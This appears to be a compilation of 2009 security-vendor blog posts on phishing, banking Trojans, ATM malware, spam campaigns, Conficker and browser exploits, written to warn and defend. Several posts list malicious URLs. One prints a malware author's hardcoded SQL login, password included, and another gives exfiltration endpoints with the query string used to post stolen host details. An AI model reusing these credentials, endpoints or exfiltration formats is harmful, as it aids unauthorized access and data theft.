With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish out personal information, as well as MySpace scams and Facebook spams.

With more than 15 percent of the traffic from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not so tech-savvy users on Orkut. They have updated the user profiles of several thousands of compromised Orkut accounts, which now link to various phished websites. These lure visiting users into divulging their personal information.

Various phished websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousands of Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.

We have observed scores of websites being used in this phishing attack. Here are a few of them:

• http://orkutsexlogi[blocked].tk
• http://s3x[blocked].kilu.de
• http://orkutst[blocked].tk
• http://album[blocked].kilu.de
• http://priya[blocked].freehostia.com

If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

Recently, my colleague Pedro Bueno wrote about “dumb” malware authors hardcoding their login credentials into their password-stealing Trojan. The malware he referenced, PWS-Banker.gen.i, ostensibly came from Brazil. Today, we found the same negligence in a similar piece of Chinese malware detected as PWS-Banker.gen.de.

When run, the password-stealing Trojan queries for the infected host’s IP address using three web-based IP address-lookup services. It then makes a SQL query over TCP to post stolen passwords to a server in China. This is a part of the actual SQL query to log into the malicious SQL server:

Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;User ID=mengmeng;[REMOVED]

mengmeng has been malicious, and what’s more, was careless to leave his login credentials in the open. Please keep your DATs updated to stay secure!

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. And, yes, we already detect this malware–as PWS-Banker.gen.i.

We frequently encounter password stealers and backdoors in computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see these malware directly implemented in banks’ automated teller machines. In these cases, Trojans have to be installed by people who have physical access to the machines. Data collecting and malware removal would need yet another visit or visits. It should seem obvious that such malware installation requires a high level of “cooperation” from the bank staff.

One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009 when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects were apprehended. But it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATM machines. The security firm Trustwave published a study concerning this matter. The software had been updated and new virtual robberies had been launched. On June 3,  The Register also raised public awareness by covering the story. 

When active, the Trojan intercepts transactions and records them on log files. To control an infected ATM, the attacker uses dedicated credit cards that allow him to activate some administrative rules. Via the ATM’s display, he can select various options from the keypad to display statistics (numbers of transactions, cards, keys), print collected data, force the machine to dispense all its cash, uninstall the malware set, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display version and statistics:

Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

The attacker can also-–through a password-protected routine–control the currency-dispensing ATM cassette:

We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:

If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

The takeaway from today’s social-engineering attack: If you receive suspicious email claiming to come from your bank, please do not follow the links in it! It’s advisable to visit banking-related websites using only your bookmarks. In the second step of today’s attack, cautious users may have picked up on the deception if they noticed that the sign “Secure Area” did not complement the nonsecure HTTP URL.

Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading :).

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

The fight against cybercrime is showing some very promising progress over the last few years. We are certainly not where we want to be, but we’re on a good path. McAfee’s own Inititiative to Fight Cybercrime has been in force for more than a half-year. Recently our Cybercrime Response Unit was launched; it’s an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: We are not alone!

McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

Even more important were the small meetings outside the offical program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world with each other and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future!

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

It’s been just a few days since we started talking about spam using Swine Flu as a way to catch user’s attention to sell pills. This time, however, the message is not very “healthy”:

The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calm down is the only thing we shouldn’t do. See how the patient becomes in advanced stage”.

As we saw yesterday on David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch user’s attention. But remember, this is a spam; they use this to make users believe that the news is true.

Links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar

=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver

=> Foto.29.04.2009.jpg.exe

They are identified as PWS-Banker-dldr and PWS-banker-gen.g

The file Foto.29.04.2009.com is a downloader which drop the URL below as C:\WINDOWS\temp\configura.exe

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

And this file is identified as PWS-Banker-gen.b

This is a common banker malware which overlays a fake image over real the banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter their personal information and even his credit card data: 

The information about the hacked machine and banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php

hxxp://[removed-2].100webspace.net/post.php

hxxp://[removed-3].100webspace.net/post.php

hxxp://[removed-4].100webspace.net/post.php

This is the strings appended to the URLs above:

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

But one image inside this malware called our attention. The image below tries to disguise itself as the website for the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

They attempt to steal usernames and passwords for this site. If the miscreants get access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see an apparently innocent e-mail could cause your banking information to be stolen and even have more serious implications as the case above.

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers…..

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world, not really a surprise when one considers the global nature of botnets and spam anyway but the country breakdown is interesting to look at. Seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

No safe country from spammers eh? When you consider that on any given day there is between 80 to 170 billion email messages with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers disposal and it is very hard to protect against.

We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case its a redirect to a Russian-based site that requires our old friend the fake codec be installed to view the movie:

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

Money laundering is a process for concealing the origin of funds generated by illegal means. People generally associate money laundering with drug trafficking, gun smuggling, or corruption. But funds misappropriated by identity theft, phishing, and carding also have to be “laundered.” Today, the mushrooming of virtual money (or e-currency) makes the job easier when you need to eliminate traces of suspicious actions. In the past, E-Gold and WebMoney were frequently under suspicion and had to respond to serious allegations of having been used to transform “dirty money” into “clean money.”

But they are not unique; ECUMoney, Liberty Reserve, PerfectMoney, Pecunix, etc. are also on the scene. As with all digital gold currencies, these exchangers offer nonreversible transactions, which is a primary advantage when you want to manipulate money.

Today, websites proposing virtual money exchanges are numerous on the Internet. They are profitable for their owners because they are subject to significant exchange commissions. It is also relatively safe for the people offering these services. In the past, malware authors explained they created their programs only for educational purposes and were not responsible for any inappropriate use. Today administrators of such websites are trying to claim they are not liable for the origin of the transmitting money.

Here too, the network is turning professional, and many former crooks are now specializing in this field. In October 2004, the U.S. Secret Service arrested people said to be responsible for a set of credit card and identity thefts that had plagued Internet users. It was the result of Operation Firewall. Most of them frequented ShadowCrew, a worldwide marketplace where thousands of members traded stolen credit cards and debit cards, as well as bank account numbers and counterfeit identification documents, such as drivers’ licenses, passports, and Social Security cards.

One convicted person, using Voleur (French for “thief”) as a pseudonym, set up a special payment system for cybercrime transactions. For a 10 percent commission, he exchanged cash for E-Gold, the well-known and controversial digital gold currency. Voleur laundered money for dozen of deals of forum members, moving amounts ranging from $40,000 to $100,000 per week. With about twenty other individuals, he pleaded guilty in November 2005, was sentenced in June 2006, and was released later on.

At that time, Voleur’s work was not institutionalized. But today, I believe, this individual is again in business and manages some websites specialized in giving advice for digital currency activities. One of them is named “Voleur Financial Services”; that’s a tall order!

On another site from the same origin (same administrators), we can see some examples of current fees:

Many people want to seize power in this fruitful business, and there are no holds barred. Enemies of Voleur often spread stories of him on the Internet and do not hesitate to reveal bank account numbers.

U.S. nationals are not alone in this business. At the time of Operation Firewall, an Eastern Europe married couple (he is Russian, she is Ukrainian),  their son, and several other people were arrested after they moved more than $35 million in suspect funds through their company, a pioneer of virtual money exchange. Their office was originally located in the Empire State Building, in New York City. Approximately $20 million flowed through E-Gold digital currency accounts.  It is also estimated they purchased approximately $15 million worth of Webmoney digital currency.

Now, from the Manhattan House of Detention, the main prisoner/offender keeps his blog, gives security advice, and is visited by compassionate countrymen.  Some of his friends (I suppose) still manage such exchange sites from Russia. From one of them, these screen shots show transfer fees and how easy it is to remain anonymous in the world of money transfers.

When you visit the website, you will discover a touching interview made in a U.S. jail and the (presumed) building housing the actual company: a bit empty, but nonetheless prestigious in the New York area.

In early April, at an annual conference of the Association of Russian Banks, Finance Minister Alexei Kudrin explained that many small banks are now “engaged in money laundering”. It seems that many suspicious online companies are also engaged in this business both in and outside of Russia.

RSA is pretty much over now and it has been a blurry several days. Some real good sessions, some real good panels. Lots of meetings and interviews and many old friends on hand (shoutouts to Dave Perry, Larry Bridwell, and Lysa Myers), but I digress. …

For me the best event was the “Hacking Exposed” session, by Stuart McClure and George Kurtz. OK, I cop to being biased because I know and work with both these gents/slackers at McAfee, but they did show a really wild hack–they pwned a primary domain controller from an iPhone! Yep, you read that correctly. They hacked a Windows server FROM an iPhone.

For those who were not among the annointed and attended, I have uploaded the slide deck here. Stu and George recorded the hack as well:

There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

As we had discussed in our previous blog, it is spread through pirated software at this point (a huge No, No anyway) so hopefully distribution will be light and not result in a large numbers. It definitely does highlight the need for security software regardless of platform!

Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

• The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
• Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
• Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
• If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
• Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
• While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendez-vous to start its latest escapade. In this case, the infected host will be contacted initially by another host over an ad-hoc P2P connection. Kind of like an alarm clock. Then, after hitting the snooze button over a period of several hours, the communication begins again - starting this time from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka update) may go unseen - or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

We have also seen some hosts serving up a Waledac payload.(Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time however, it is closer to the original patch - so as to elude detection. (Note: our McAfee Conficker Detection tool is in process of being redesigned to allow detection of the latest variants).

There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as - Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. - Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves a HTTP rendez-vous domain name, it compares the IP resolved with the list of IPs it already queried, if the new IP is in the list, it will move on to the next domain in its list.

Of course, we will update if anything else comes along…

Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributers have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht; a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out Malware distributors have honed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious - and our first take was “Wow, they are fast”.    We watched the evolution of the number of google results that presented malware over the course of April 2. The last we checked - even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

The search results don’t look so threatening, but if you are to click on the first few URLs, you’ll find differently. Each of these URLs is a rouge anti-virus URL that will distribute malware. Here are a couple of examples…

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

So what about that 1969 Rybovich? What about further curiosity based Googling? Next time you find yourself conducting such a search, do so with caution. Consider if the search result URLs all look similar. In this case, that is first red flag of caution. When you click to go to a link; does the content look like what you expected or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed onto red flag number three to see the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

Everyday there are thousands of websites that have been injected with malicious code and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, and its features are easy-to-use, as well as free. Multiple buffer overflow in Baofeng2 Storm allow for the downloading and execution of files. CVE Number is CVE-2007-4816.
Reference:
http://www.baofeng.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that is integrated with a powerful MP3 search, web page search, flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. CVE Number is CVE-2007-4105.
Reference:
http://bar.baidu.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great deal of customers. Buffer overflows in Xunlei Web before version 5.6.3.44 can execute arbitrary code with the vulnerability. CVE Number is CVE-2007-5064.
Reference:
http://dl.xunlei.com/index.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software base on p2p streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-4748.
Reference:
http://www.ppstream.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a kind of free game. It is a gaming platform that covers all the related fields and areas of network games. It has a category of nearly one hundred species of games, including Card games, leisure games, large-scale network and so on. Buffer overflows in the GLChat.ocx of the OurGame Chat module in the ConnectAndEnterRoom() method allows for the execution arbitrary code. Its CVE number is CVE-2007-5722.
Reference:
http://www.ourgame.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool. It’s similar to a PDF reader. Buffer overflows in the Ultra Star Reader allows for execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-5807.
Reference:
http://www.ssreader.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allows for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:
http://www.jetaudio.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as http, ftp and bit torrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:
http://www.xunlei.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

We’ve all read of social engineering tactics before and how gullible users fall prey to many tactics used by virus authors. As researchers we often give recommendations to family and friends on how not to fall prey to such tricks, but once in a while we need to remind ourselves too that we are included in the intended list of targets.

As researchers we deal with different flavors of malware. Over time and with experience researchers often reach a state of “enlightenment” where you look at a sample and you know if it’s malicious. At least that’s what we believe; however there are times where we too are made to think twice. When dealing with malware it’s not uncommon for analysts to come across a note from the authors once in a while. At times they are taunts and at times they are something more like the example below. We came across a sample which contains messages for security researchers asking to not add detections for the file as this is not a virus. Considering that there are legitimate packers that put warnings for researchers to prevent falsely detecting them, such non-verbal communication can at times make one take a second look.

Besides the fact that they seem to agree that they have authored this program , technically they are right - this is not a virus, but a trojan downloader !!  This trojan silently downloads arbitrary files (porn dialer in this particular case) from remote site (hxxp://[skipped].com/del/cmb_[random].exe) and executes it. (New detection added to detect both samples is “Generic.acf”)

A second example was a little more fascinating for us. Researchers often take two approaches to analysis: Static (opening up the file in Hiew or other similar tools) and Dynamic (replicating the malware). In this case we opened the file in Hiew and the first thing that was apparent was that the file had abnormal resources and import data.

Moving past this error, we also noticed that the Entry Point mentioned in the header is 0001A001 and for an Image Base of 00400000, we should be able to get Hiew to go to the EP which should be at 0041A001. However it looks like the file ends at 00410DFF causing Hiew to fail reaching EP.

At this point in our minds we are more or less sure that this file is corrupt and it could be the end of analysis, but WAIT !!! Though we may be certain the Windows Loader will complain if we attempt to execute this sample, it actually runs like a charm. OK things are getting really fishy, so back to the drawing board we go. We re-open the file up in Hiew and this time we observe in more detail, the section header.

There are 10 odd looking sections which is fine, some of the sections have Physical Size as 0 and others overlap which though suspicious is fine too. And then we stumble upon the possible culprit. The authors have modified the Physical Size of the first two sections to FF003000 and FF000200 respectively where as their Virtual Sizes are 3000 and 1000. Patching the section sizes to 00003000 and 00000200 fixes the EP issue in Hiew allowing it to get to the correct EP.

Heck even IDA wasn’t able to load the files and gave the following errors and quit: “Virtual Array: Address space limit reached”

Olly on the other hand mentions the large section size but still loads it comfortably.

Clearly the authors are attempting social engineering here by crafting the section table. A second opinion is also that using this technique might trick certain AV products to mis-load such files. We’d like to hear your thoughts too…..

So the moral of the story is, don’t judge a book by its cover or malware based on only one tool, drink more coffee and keep at it. Happy Researching !!  [We currently detect this as Spy-Agent.dp.gen]

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

An exploit found to be targeting a recently patched vulnerability for Internet Explorer 7 was discovered in-the-wild.  Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical with the possibility of a consistent exploit code. The modus operandi bears close resemblance to the zero-day attack using word documents, we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This word document contains an embedded ActiveX control which upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious word document is detected with the current DATS as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

